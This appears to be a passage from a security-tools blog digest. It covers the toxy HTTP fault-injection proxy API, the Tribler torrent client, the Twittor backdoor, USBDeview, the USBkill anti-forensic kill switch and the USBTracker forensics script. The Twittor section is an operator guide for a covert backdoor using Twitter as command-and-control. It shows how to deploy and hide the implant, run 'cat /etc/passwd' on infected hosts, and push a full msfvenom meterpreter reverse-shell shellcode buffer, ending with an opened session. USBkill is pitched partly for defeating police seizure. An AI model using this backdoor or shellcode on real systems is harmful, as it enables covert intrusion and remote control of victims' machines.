    Forward to multiple servers balancing among them.
    For more information, see the rocky docs

    toxy#replay(url)
    Define a new replay server. You can call this method multiple times to define multiple replay servers.
    For more information, see the rocky docs

    toxy#use(middleware)
    Plug in a custom middleware.
    For more information, see the rocky docs .

    toxy#useResponse(middleware)
    Plug in a response outgoing traffic middleware.
    For more information, see the rocky docs .

    toxy#useReplay(middleware)
    Plug in a replay traffic middleware.
    For more information, see the rocky docs

    toxy#requestBody(middleware)
    Intercept incoming request body. Useful to modify it on the fly.
    For more information, see the rocky docs

    toxy#responseBody(middleware)
    Intercept outgoing response body. Useful to modify it on the fly.
    For more information, see the rocky docs

    toxy#middleware()
    Return a standard middleware to use with connect/express.

    toxy#host(host)
    Overwrite the Host header with a custom value. Similar to forwardHost option.

    toxy#redirect(url)
    Redirect traffic to the given URL.

    toxy#findRoute(routeIdOrPath, [ method ])
    Find a route by ID or path and method.

    toxy#listen(port)
    Starts the built-in HTTP server, listening on a specific TCP port.

    toxy#close([ callback ])
    Closes the HTTP server.

    toxy#poison(poison)
    Alias: usePoison , useIncomingPoison
    Register a new poison to infect incoming traffic.

    toxy#outgoingPoison(poison)
    Alias: useOutgoingPoison , responsePoison
    Register a new poison to infect outgoing traffic.

    toxy#rule(rule)
    Alias: useRule
    Register a new rule.

    toxy#withRule(rule)
    Aliases: poisonRule , poisonFilter
    Apply a new rule for the latest registered poison.

    toxy#enable(poison)
    Enable a poison by name identifier

    toxy#disable(poison)
    Disable a poison by name identifier

    toxy#remove(poison)
    Return: boolean
    Remove poison by name identifier.

    toxy#isEnabled(poison)
    Return: boolean
    Checks if a poison is enabled by name identifier.

    toxy#disableAll()
    Alias: disablePoisons
    Disable all the registered poisons.

    toxy#getPoison(name)
    Return: Directive|null
    Searchs and retrieves a registered poison in the stack by name identifier.

    toxy#getIncomingPoison(name)
    Return: Directive|null
    Searchs and retrieves a registered incoming poison in the stack by name identifier.

    toxy#getOutgoingPoison(name)
    Return: Directive|null
    Searchs and retrieves a registered outgoing poison in the stack by name identifier.

    toxy#getPoisons()
    Return: array<Directive>
    Return an array of registered poisons.

    toxy#getIncomingPoisons()
    Return: array<Directive>
    Return an array of registered incoming poisons.

    toxy#getOutgoingPoisons()
    Return: array<Directive>
    Return an array of registered outgoing poisons.

    toxy#flush()
    Alias: flushPoisons
    Remove all the registered poisons.

    toxy#enableRule(rule)
    Enable a rule by name identifier.

    toxy#disableRule(rule)
    Disable a rule by name identifier.

    toxy#removeRule(rule)
    Return: boolean
    Remove a rule by name identifier.

    toxy#disableRules()
    Disable all the registered rules.

    toxy#isRuleEnabled(rule)
    Return: boolean
    Checks if the given rule is enabled by name identifier.

    toxy#getRule(rule)
    Return: Directive|null
    Searchs and retrieves a registered rule in the stack by name identifier.

    toxy#getRules()
    Return: array<Directive>
    Returns and array with the registered rules wrapped as Directive .

    toxy#flushRules()
    Remove all the rules.

    toxy.addPoison(name, fn)
    Extend built-in poisons.

    toxy.addRule(name, fn)
    Extend built-in rules.

    toxy.poisons => Object
    Exposes a map with the built-in poisons.

    toxy.rules => Object
    Exposes a map with the built-in rules.

    toxy.VERSION => String
    Current toxy semantic version.

    ToxyRoute
    ToxyRoute exposes the same interface as Toxy global interface, it just adds some route level additional methods .
    Further actions you perform againts the ToxyRoute API will only be applicable at route-level (nested). In other words: you already know the API.
    This example will probably clarify possible doubts:
    var toxy = require('toxy')
    var proxy = toxy()
    
    // Now using the global API
    proxy
      .forward('http://server.net')
      .poison(toxy.poisons.bandwidth({ bps: 1024 }))
      .rule(toxy.rules.method('GET'))
    
    // Now create a route
    var route = proxy
      .get('/foo')
      .toPath('/bar') // Route-level API method
      .host('server.net') // Route-level API method
      .forward('http://new.server.net')
    
    // Now using the ToxyRoute interface
    route
      .poison(toxy.poisons.bandwidth({ bps: 512 }))
      .rule(toxy.rules.contentType('json'))

    Directive(middlewareFn)
    A convenient wrapper internally used for poisons and rules.
    Normally you don't need to know this interface, but for hacking purposes or more low-level actions might be useful.

    Directive#enable()
    Return: boolean

    Directive#disable()
    Return: boolean

    Directive#isEnabled()
    Return: boolean

    Directive#rule(rule)
    Alias: filter

    Directive#handler()
    Return: function(req, res, next)

    HTTP API
    The toxy HTTP API follows the JSON API conventions, including resource based hypermedia linking.

    Usage
    For a featured use case, see the admin server example.
    const toxy = require('toxy')
    
    // Create the toxy admin server
    var admin = toxy.admin({ cors: true })
    admin.listen(9000)
    
    // Create the toxy proxy
    var proxy = toxy()
    proxy.listen(3000)
    
    // Add the toxy instance to be managed by the admin server
    admin.manage(proxy)
    
    // Then configure the proxy
    proxy
      .forward('http://my.target.net')
    
    proxy
      .get('/slow')
      .poison(toxy.poisons.bandwidth({ bps: 1024 }))
    
    // Handle the rest of the traffic
    proxy
      .all('/*')
      .poison(toxy.poisons.bandwidth({ bps: 1024 * 5 }))
    
    console.log('toxy proxy listening on port:', 3000)
    console.log('toxy admin server listening on port:', 9000)
    For more details about the admin programmatic API, see below .

    Authorization
    The HTTP API can be protected to unauthorized clients. Authorized clients must define the API key token via API-Key or Authorization HTTP headers.
    To enable it, you should simple pass the following options to toxy admin server:
    const toxy = require('toxy')
    
    const opts = { apiKey: 's3cr3t' }
    var admin = toxy.admin(opts)
    
    admin.listen(9000)
    console.log('protected toxy admin server listening on port:', 9000)

    API
    Hierarchy :
    • Servers - Managed toxy instances
      • Rules - Globally applied rules
      • Poisons - Globally applied poisons
        • Rules - Poison-specific rules
      • Routes - List of configured routes
        • Route - Object for each specific route
          • Rules - Route-level registered rules
          • Poisons - Route-level registered poisons
            • Rules - Route-level poison-specific rules

    GET /

    Servers

    GET /servers

    GET /servers/:id

    Rules

    GET /servers/:id/rules

    POST /servers/:id/rules
    Accepts: application/json
    Example payload:
    {
      "name": "method",
      "options": "GET"
    }

    DELETE /servers/:id/rules

    GET /servers/:id/rules/:id

    DELETE /servers/:id/rules/:id

    Poisons

    GET /servers/:id/poison

    POST /servers/:id/poisons
    Accepts: application/json
    Example payload:
    {
      "name": "latency",
      "phase": "outgoing",
      "options": { "jitter": 1000 }
    }

    DELETE /servers/:id/poisons

    GET /servers/:id/poisons/:id

    DELETE /servers/:id/poisons/:id

    GET /servers/:id/poisons/:id/rules

    POST /servers/:id/poisons/:id/rules
    Accepts: application/json
    Example payload:
    {
      "name": "method",
      "options": "GET"
    }

    DELETE /servers/:id/poisons/:id/rules

    GET /servers/:id/poisons/:id/rules/:id

    DELETE /servers/:id/poisons/:id/rules/:id

    Routes

    GET /servers/:id/routes

    POST /servers/:id/routes
    Accepts: application/json
    Example payload:
    {
      "path": "/foo", // Required
      "method": "GET", // use ALL for all the methods
      "forward": "http://my.server", // Optional custom forward server URL
    }

    DELETE /servers/:id/routes

    GET /servers/:id/routes/:id

    DELETE /servers/:id/routes/:id

    Route rules

    GET /servers/:id/routes/:id/rules

    POST /servers/:id/routes/:id/rules
    Accepts: application/json
    Example payload:
    {
      "name": "method",
      "options": "GET"
    }

    DELETE /servers/:id/routes/:id/rules

    GET /servers/:id/routes/:id/rules/:id

    DELETE /servers/:id/routes/:id/rules/:id

    Route poisons

    GET /servers/:id/routes/:id/poisons

    POST /servers/:id/routes/:id/poisons
    Accepts: application/json
    Example payload:
    {
      "name": "latency",
      "phase": "outgoing",
      "options": { "jitter": 1000 }
    }

    DELETE /servers/:id/routes/:id/poisons

    GET /servers/:id/routes/:id/poisons/:id

    DELETE /servers/:id/routes/:id/poisons/:id

    GET /servers/:id/routes/:id/poisons/:id/rules

    POST /servers/:id/routes/:id/poisons/:id/rules
    Accepts: application/json
    Example payload:
    {
      "name": "method",
      "options": "GET"
    }

    DELETE /servers/:id/routes/:id/poisons/:id/rules

    GET /servers/:id/routes/:id/poisons/:id/rules/:id

    DELETE /servers/:id/routes/:id/poisons/:id/rules/:id

    Programmatic API
    The built-in HTTP admin server also provides a simple interface open to extensibility and hacking purposes. For instance, you can plug in additional middleware to the admin server, or register new routes.

    toxy.admin([ opts ])
    Returns: Admin
    Supported options :
    • apiKey string - Optional API key to protect the server
    • port number - Optional. TCP port to listen
    • cors boolean - Enable CORS for web browser access
    • middleware array<function> - Plug in additional middleware
    • ssl object - Node.js HTTPS server TLS options .

    Admin#listen([ port, host ])
    Start listening on the network.

    Admin#manage(toxy)
    Manage a toxy server instance.

    Admin#find(toxy)
    Find a toxy instance. Accepts toxy server ID or toxy instance.

    Admin#remove(toxy)
    Stop managing a toxy instance.

    Admin#use(...middleware)
    Register a middleware.

    Admin#param(...middleware)
    Register a param middleware.

    Admin#get(path, [ ...middleware ])
    Register a GET route.

    Admin#post(path, [ ...middleware ])
    Register a POST route.

    Admin#put(path, [ ...middleware ])
    Register a PUT route.

    Admin#delete(path, [ ...middleware ])
    Register a DELETE route.

    Admin#patch(path, [ ...middleware ])
    Register a PATCH route.

    Admin#all(path, [ ...middleware ])
    Register a route accepting any HTTP method.

    Admin#middleware(req, res, next)
    Middleware to plug in with connect/express.

    Admin#close(cb)
    Stop the server.


    Download Toxy

    Tribler - Download Torrents using Tor-inspired onion routing


    Tribler is a research project of Delft University of Technology. Tribler was created over nine years ago as a new open source Peer-to-Peer file sharing program. During this time over one million users have installed it successfully and three generations of Ph.D. students tested their algorithms in the real world.

    Tribler is the first client which continuously improves upon the aging BitTorrent protocol from 2001 and addresses its flaws. We expanded it with, amongst others, streaming from magnet links, keyword search for content, channels and reputation-management. All these features are implemented in a completely distributed manner, not relying on any centralized component. Still, Tribler manages to remain fully backwards compatible with BitTorrent.

    Work on Tribler has been supported by multiple Internet research European grants. In total we received 3,538,609 Euro in funding for our open source self-organising systems research.
    Roughly 10 to 15 scientists and engineers work on it full-time. Our ambition is to make darknet technology, security and privacy the default for all Internet users. As of 2013 we have received code from 46 contributors and 143.705 lines of code.

    Vision & Mission

    "Push the boundaries of self-organising systems, robust reputation systems and craft collaborative systems with millions of active participants under continuous attack from spammers and other adversarial entities."


    Twittor - A fully featured backdoor that uses Twitter as a C&C server


    A stealthy Python based backdoor that uses Twitter (Direct Messages) as a command and control server This project has been inspired by Gcat which does the same but using a Gmail account.

    Setup
    For this to work you need:
    • A Twitter account ( Use a dedicated account! Do not use your personal one! )
    • Register an app on Twitter with Read, write, and direct messages Access levels.
    Install the dependencies:
    $ pip install -r requirements.txt
    
    This repo contains two files:
    • twittor.py which is the client
    • implant.py the actual backdoor to deploy
    In both files, edit the access token part and add the ones that you previously generated:
    CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
    CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
    
    ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
    ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
    
    USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'
    You're probably going to want to compile implant.py into an executable using Pyinstaller In order to remove the console when compiling with Pyinstaller, the flags --noconsole --onefile will help. Just saying.

    Usage
    In order to run the client, launch the script.
    $ python twittor.py
    
    You'll then get into an 'interactive' shell which offers few commands that are:
    $ help
    
        refresh - refresh C&C control
        list_bots - list active bots
        list_commands - list executed commands
        !retrieve <jobid> - retrieve jobid command
        !cmd <MAC ADDRESS> command - execute the command on the bot
        !shellcode <MAC ADDRESS> shellcode - load and execute shellcode in memory (Windows only)
        help - print this usage
        exit - exit the client
    
    $ 
    
    • Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
    $ list_bots
    B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
    $
    
    The output is the MAC address which is used to uniquely identifies the system but also gives you OS information the implant is running on. In that case a Linux box.
    • Let's issue a command to an implant:
    $ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
    [+] Sent command "cat /etc/passwd" with jobid: UMW07r2
    $
    
    Here we are telling B7:76:1F:0B:50:B7 to execute cat /etc/passwd , the script then outputs the jobid that we can use to retrieve the output of that command
    • Lets get the results!
    $ !retrieve UMW07r2
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    (...)
    
    Command to use in that case is !retrieve followed by the jobid from the command.
    • Refresh results
    In order to retrieve new bots/command outputs but also force the client to refresh the results, use the refresh command.
    $ refresh
    [+] Sending command to retrieve alive bots
    [+] Sleeping 10 secs to wait for bots
    $
    
    This will send a PING request and wait 10 seconds for them to answer. Direct messages will then be parsed - Bot list will be refreshed but also the command list, including new command outputs.
    • Retrieve previous commands
    As I said earlier, (previous) commands will be retrieved from older direct messages (limit is 200) and you can actually retrieve/see them by using the list_commands command
    $ list_commands
    8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
    VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
    9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
    aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
    8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
    $
    
    • Running shellcode (Windows hosts)
    This option might be handy in order to retrieve a meterpreter session and this article becomes really useful.
    Generate your meterpreter shellcode, like:
    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python
    (...)
    Payload size: 299 bytes
    buf =  ""
    buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
    buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
    buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
    buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
    buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
    buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
    buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
    buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
    buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
    buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
    buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
    buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
    buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
    buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
    buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x00\x00\x01\x68"
    buf += "\x02\x00\x0e\x1f\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
    buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
    buf += "\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
    buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a"
    buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
    buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
    buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6"
    buf += "\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
    
    Extract the shellcode and send it to the specified bot using the !shellcode command!
    $ !shellcode 11:22:33:44:55 \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)
    [+] Sent shellcode with jobid: xdr7mtN
    $
    
    Et voilà!
    msf exploit(handler) > exploit
    
    [*] Started reverse handler on 10.0.0.1:3615 
    [*] Starting the payload handler...
    [*] Sending stage (884270 bytes) to 10.0.0.99
    [*] Meterpreter session 1 opened (10.0.0.1:3615 -> 10.0.0.99:49254) at 2015-09-08 10:19:04 -0400
    
    meterpreter > getuid
    Server username: WIN-XXXXXXXXX\PaulSec
    
    Open a beer and enjoy your reverse meterpreter shell.


    Download Twittor

    USBDeview v2.45 - View all installed/connected USB devices on your system


    USBDeview is a small utility that lists all USB devices that currently connected to your computer, as well as all USB devices that you previously used.

    For each USB device, extended information is displayed: Device name/description, device type, serial number (for mass storage devices), the date/time that device was added, VendorID, ProductID, and more...

    USBDeview also allows you to uninstall USB devices that you previously used, disconnect USB devices that are currently connected to your computer, as well as to disable and enable USB devices.

    You can also use USBDeview on a remote computer, as long as you login to that computer with admin user.

    Using USBDeview

    USBDeview doesn't require any installation process or additional DLL files. Just copy the executable file (USBDeview.exe) to any folder you like, and run it.

    The main window of USBDeview displays all USB devices installed on your system. You can select one or more items, and then disconnect (unplug) them , uninstall them, or just save the information into text/xml/html file.

    USBDeview Columns Description
    • Device Name: Specifies the device name. For some device, this column may display meaningless name, like "USB Device". If the device name is meaningless, try to look at the Description column.
    • Device Description: The description of the device.
    • Device Type: The device type, according to USB class code. For more information about USB classes: USB Class Codes.
    • Connected: Specifies whether the device is currently connected to your computer. If the device is connected, you can use the 'Disconnect Selected Devices' option (F9) to disconnect the device.
    • Safe To Unplug: Specifies whether it's safe to unplug the device from the USB plug without disconnecting it first. If the value of this column is false, and you want to unplug this device, you must first disconnect this device by using the 'Disconnect Selected Devices' option (F9) of USBDeview utility, or by using the 'Unplug or Eject Hardware' utility of Windows operating system.
    • Drive Letter: Specifies the drive letter of the USB device. This column is only relevant to USB flash memory devices and to USB CD/DVD drives. Be aware that USBDeview cannot detect drive letters of USB hard-disks.
    • Serial Number: Specifies the serial number of the device. This column is only relevant to mass storage devices (flash memory devices, CD/DVD drives, and USB hard-disks).
    • Created Date: Specifies the date/time that the device was installed. In most cases, this date/time value represents the time that you first plugged the device to the USB port. However, be aware that in some circumstances this value may be wrong. Also, On Windows 7, this value is initialized with the current date/time on every reboot.
    • Last Plug/Unplug Date: Specifies the last time that you plugged/unplugged the device. This date value is lost when you restart the computer.
    • VendorID/ProductID: Specifies the VendorID and ProductID of the device. For unofficial list of VendorID/ProductID, click here.
    • USB Class/Subclass/Protocol: Specifies the Class/Subclass/Protocol of the device according to USB specifications. For more information about USB classes: USB Class Codes.
    • Hub/Port: Specifies the hub number and port number that the device was plugged into. This value is empty for mass storage devices.
    Notice: According to user reports, On some systems the 'Last Plug/Unplug Date' and the 'Created Date' values are initialized after reboot. This means that these columns may display the reboot time instead of the correct date/time.


    USBkill - Anti-Forensic Kill-Switch that waits for a change on your USB ports


    USBkill is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer.

    To run:
    sudo python usbkill.py

    Why?

    Some reasons to use this tool:
    • In case the police or other thugs come busting in (or steal your laptop from you when you are at a public library as happened to Ross). The police commonly uses a "mouse jiggler" to keep the screensaver and sleep mode from activating.
    • You don’t want someone retrieve documents (such as private keys) from your computer or install malware/backdoors via USB.
    • You want to improve the security of your (Full Disk Encrypted) home or corporate server (e.g. Your Raspberry).
    [!] Important: Make sure to use (partial) disk encryption! Otherwise they will get in anyway.
    Tip: Additionally, you may use a cord to attach a USB key to your wrist. Then insert the key into your computer and start usbkill. If they steal your computer, the USB will be removed and the computer shuts down immediately.

    Feature List

    (version 1.0-rc.2)
    • Compatible with Linux, *BSD and OS X.
    • Shutdown the computer when there is USB activity.
    • Customizable. Define which commands should be executed just before shut down.
    • Ability to whitelist a USB device.
    • Ability to change the check interval (default: 250ms).
    • Ability to melt the program on shut down.
    • Works with sleep mode (OS X).
    • No dependency except srm. sudo apt-get install secure-delete
    • Sensible defaults

    Supported command line arguments (mainly for devs):
    • --no-shut-down: Execute all the (destructive) commands you defined in settings.ini, but don’t turn off the computer.
    • --cs: Copy program folder settings.ini to /etc/usbkill/settings.ini

    Download USBkill

    USBTracker - Script to track USB devices events and artifacts in a Windows OS


    USBTracker is a quick & dirty coded incident response and forensics Python script to dump USB related information and artifacts from a Windows OS (vista and later).

    Special recommandations
    USBTracker read some protected log files and needs to be run with administrator permissions. The most simple way to run USBTracker is to launch a CMD or Powershell console with a right click "run as administrator" , then execute the script / exe inside it.

    Executable version
    If you don't have a python distribution installed on the computer you want to analyze with USBTracker, you can also download an .exe "compiled" version with *PyInstaller of the script from the repository.

    Dependencies
    USBTracker is developed with Python 2.7 and has not been tested with other Python versions. It uses the great Python module Python-evtx of Willi Ballenthin. So, please don't forget to install it before use USBTracker.

    Usage

    Help
    If you want display help, just use the "-h" flag :
    PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -h
    USBTracker alpha
    2015 - Sysinsider
    
    USBTracker it's a free tool which allow you to extract some USB artifacts from a Windows OS (Vista and later).
    You must execute USBTracker inside a CMD/Powershell console runnnig with administror privileges to be able to dump some
    log files artifacts.
    
    usage: usbtracker.py [-h] [-u | -uu] [-nh] [-df] [-x]
    
    optional arguments:
      -h, --help            show this help message and exit
      -u, --usbstor         Dump USB artifacts from USBSTOR registry
      -uu, --usbstor-verbose
                            Dump USB detailed artifacts from USBSTOR registry.
      -nh, --no-hardwareid  Hide HardwareID value during a USBSTOR detailed
                            artifacts registry dump.
      -df, --driver-frameworks
                            Dump USB artifacts and events from the Windows
                            DriverFrameworks Usermode log.
      -x, --raw-xml-event   Display event results in raw xml (with -df option
                            only).
    

    List known USB storage devices
    If you want to list all USB storage devices known by Windows, use the "-u" flag to get a simple list :
    PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -u
    USBTracker alpha
    2015 - Sysinsider
    
    USBTracker it's a free tool which allow you to extract some USB artifacts from a Windows OS (Vista and later).
    You must execute USBTracker inside a CMD/Powershell console runnnig with administror privileges to be able to dump some
    log files artifacts.
    
    USB device(s) known by this computer :
    =====================================
    
    CdRom&Ven_HL-DT-ST&Prod_DVDRAM_GP08NU20&Rev_1.00
    Disk&Ven_Generic&Prod_STORAGE_DEVICE&Rev_0272
    Disk&Ven_Kingston&Prod_DataTraveler_2.0&Rev_1.00
    Disk&Ven_WD&Prod_5000AAV_External&Rev_1.65
    Disk&Ven_WD&Prod_Elements_10B8&Rev_1012
    Disk&Ven_WD&Prod_My_Book_1140&Rev_1012
    Other&Ven_WD&Prod_SES_Device&Rev_1012
    
    or the "-uu" flag if you want to get a detailed list :
    PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -uu
    USBTracker alpha
    2015 - Sysinsider
    
    USBTracker it's a free tool which allow you to extract some USB artifacts from a Windows OS (Vista and later).
    You must execute USBTracker inside a CMD/Powershell console runnnig with administror privileges to be able to dump some
    log files artifacts.
    
    USB device(s) known by this computer :
    =====================================
    
    CdRom&Ven_HL-DT-ST&Prod_DVDRAM_GP08NU20&Rev_1.00
    
            Serial : 00101016400086C55&0
    
            DeviceDesc : @cdrom.inf,%gencdrom_devdesc%;CD-ROM Drive
            Capabilities : 16
            HardwareID : [u'USBSTOR\\CdRomHL-DT-STDVDRAM_GP08NU20_1.00', u'USBSTOR\\CdRomHL-DT-STDVDRAM_GP08NU20_', u'USBSTO
    R\\CdRomHL-DT-ST', u'USBSTOR\\HL-DT-STDVDRAM_GP08NU20_1', u'HL-DT-STDVDRAM_GP08NU20_1', u'USBSTOR\\GenCdRom', u'GenCdRom
    ']
            CompatibleIDs : [u'USBSTOR\\CdRom', u'USBSTOR\\RAW']
            ContainerID : {def10b43-2e59-5e9f-8ca6-ffab1cfc9afa}
            Service : cdrom
            ClassGUID : {4d36e965-e325-11ce-bfc1-08002be10318}
            ConfigFlags : 0
            Driver : {4d36e965-e325-11ce-bfc1-08002be10318}\0001
            Class : CDROM
            Mfg : @cdrom.inf,%genmanufacturer%;(Standard CD-ROM drives)
            FriendlyName : HL-DT-ST DVDRAM GP08NU20 USB Device
    
    ======================================================================
    
    Disk&Ven_Generic&Prod_STORAGE_DEVICE&Rev_0272
    
            Serial : 000000000272&0
    
            DeviceDesc : @disk.inf,%disk_devdesc%;Disk drive
            Capabilities : 16
            HardwareID : [u'USBSTOR\\DiskGeneric_STORAGE_DEVICE__0272', u'USBSTOR\\DiskGeneric_STORAGE_DEVICE__', u'USBSTOR\
    \DiskGeneric_', u'USBSTOR\\Generic_STORAGE_DEVICE__0', u'Generic_STORAGE_DEVICE__0', u'USBSTOR\\GenDisk', u'GenDisk']
            CompatibleIDs : [u'USBSTOR\\Disk', u'USBSTOR\\RAW']
            ContainerID : {a3ce89cb-5363-54a8-8d4f-af2374c200a5}
            ConfigFlags : 0
            ClassGUID : {4d36e967-e325-11ce-bfc1-08002be10318}
            Driver : {4d36e967-e325-11ce-bfc1-08002be10318}\0004
            Class : DiskDrive
            Mfg : @disk.inf,%genmanufacturer%;(Standard disk drives)
            Service : disk
            FriendlyName : Generic STORAGE DEVICE USB Device
    
    ======================================================================
    
    ...
    
    

    Dumping events and artifacts from Microsoft-Windows-DriverFrameworks-UserMode%4Operational.evtx log file :
    To dump all USB related events (currently EventID 2003, 2004, 2005, 2010, 2100, 2102 & 2105) from the Microsoft-Windows-DriverFrameworks-UserMode%4Operational.evtx log file, use the "-df" flag.
    PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -df
    USBTracker alpha
    2015 - Sysinsider
    
    USBTracker it's a free tool which allow you to extract some USB artifacts from a Windows OS (Vista and later).
    You must execute USBTracker inside a CMD/Powershell console runnnig with administror privileges to be able to dump some
    log files artifacts.
    
    USB related event(s) found in the event log :
    =============================================
    
    UTC Time : 2015-01-18 20:31:34.138399
    EventID : 2003 | Description : UMDFHostDeviceArrivalBegin | Computer : 37L4247F27-25 | User SID : S-1-5-19 | User : LocalService
    Lifetime : 8c076f4d-6405-4414-a829-ee44a94e3893
    WPDBUSENUMROOT\UMB\2&37C186B&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&0#
    
    UTC Time : 2015-01-18 20:31:34.138399
    EventID : 2010 | Description : UMDFHostDeviceArrivalEnd | Computer : 37L4247F27-25 | User SID : S-1-5-19 | User : LocalService
    Lifetime : 8c076f4d-6405-4414-a829-ee44a94e3893
    WPDBUSENUMROOT\UMB\2&37C186B&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&0#
    
    UTC Time : 2015-01-18 20:31:34.138399
    EventID : 2004 | Description : UMDFHostAddDeviceBegin | Computer : 37L4247F27-25 | User SID : S-1-5-19 | User : LocalService
    Lifetime : 8c076f4d-6405-4414-a829-ee44a94e3893
    WPDBUSENUMROOT\UMB\2&37C186B&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&0#
    
    ...
    
    To dump the same events in XML format, just add the "-x" flag :
    PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -df -x
    USBTracker alpha
    2015 - Sysinsider
    
    USBTracker it's a free tool which allow you to extract some USB artifacts from a Windows OS (Vista and later).
    You must execute USBTracker inside a CMD/Powershell console runnnig with administror privileges to be able to dump some
    log files artifacts.
    
    USB related event(s) found in the event log :
    =============================================
    
    <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-DriverFra
    meworks-UserMode" Guid="2e35aaeb-857f-4beb-a418-2e6c0e54d988"></Provider>
    <EventID Qualifiers="">1003</EventID>
    <Version>1</Version>
    <Level>4</Level>
    <Task>17</Task>
    <Opcode>1</Opcode>
    <Keywords>0x8000000000000000</Keywords>
    <TimeCreated SystemTime="2015-01-18 20:31:34.013599"></TimeCreated>
    <EventRecordID>2</EventRecordID>
    <Correlation ActivityID="" RelatedActivityID=""></Correlation>
    <Execution ProcessID="836" ThreadID="1488"></Execution>
    <Channel>Microsoft-Windows-DriverFrameworks-UserMode/Operational</Channel>
    <Computer>37L4247F27-25</Computer>
    <Security UserID="S-1-5-18"></Security>
    </System>
    <UserData><UMDFDriverManagerHostCreateStart lifetime="8c076f4d-6405-4414-a829-ee44a94e3893" xmlns:auto-ns2="http://schem
    as.microsoft.com/win/2004/08/events" xmlns="http://www.microsoft.com/DriverFrameworks/UserMode/Event"><HostGuid>{193a182
    0-d9ac-4997-8c55-be817523f6aa}</HostGuid>
    <DeviceInstanceId>WPDBUSENUMROOT.UMB.2&amp;37C186B&amp;0&amp;STORAGE#VOLUME#_??_USBSTOR#DISK&amp;VEN_KINGSTON&amp;PROD_D
    ATATRAVELER_2.0&amp;REV_1.00#0019B931D970C8C0C5DB00B9&amp;0#</DeviceInstanceId>
    </UMDFDriverManagerHostCreateStart>
    </UserData>
    </Event>
    
    ...
    

